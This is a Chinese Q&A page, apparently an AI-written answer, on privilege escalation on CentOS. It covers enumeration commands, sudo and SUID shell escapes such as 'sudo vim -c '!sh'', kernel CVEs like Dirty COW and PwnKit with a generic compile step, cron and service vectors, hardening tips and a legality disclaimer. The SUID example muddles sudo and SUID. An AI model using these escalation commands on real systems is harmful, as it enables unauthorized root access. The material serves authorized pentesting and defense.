温馨提示×

centos exploit怎样提权

小樊
41
2026-09-09 06:03:43
栏目: 智能运维

在 CentOS 上进行 提权(privilege escalation) 通常属于 系统安全测试/渗透测试 的范畴。如果你是授权的安全测试人员,提权流程一般是:


一、信息收集(非常重要)

先确认当前权限与环境:

whoami
id
uname -a
cat /etc/redhat-release

查看敏感信息:

sudo -l
crontab -l
cat /etc/crontab

二、常见 CentOS 提权方式(合法场景)

1. sudo 配置错误

sudo -l

如果看到类似:

(ALL) NOPASSWD: /usr/bin/vim

可直接:

sudo vim -c '!sh'

2. SUID 程序滥用

查找 SUID 文件:

find / -perm -4000 -type f 2>/dev/null

例如 find 有 SUID:

sudo find . -exec /bin/sh \; -quit

3. 内核漏洞(Exploit)

常见 CentOS 内核漏洞:

  • CVE-2016-5195(Dirty COW)
  • CVE-2021-4034(PwnKit)
  • CVE-2022-0847(Dirty Pipe)

示例:

gcc dirty.c -o dirty
./dirty

⚠️ 必须只在授权环境中使用


4. Cron / 服务提权

  • 可写 cron 脚本
  • 可写 systemd service
  • 可写 PATH 中的可执行文件

三、防御角度(如果你是管理员)

  • 最小化 sudo 权限
  • 移除不必要的 SUID
  • 及时升级内核
  • 使用 SELinux

四、重要声明

未经授权的提权属于违法行为
如果你需要,我可以:

  • 帮你做 CentOS 安全加固
  • 教你 CTF 提权实验环境搭建
  • 分析某次 授权渗透测试 的提权思路

你可以告诉我你的使用场景。

0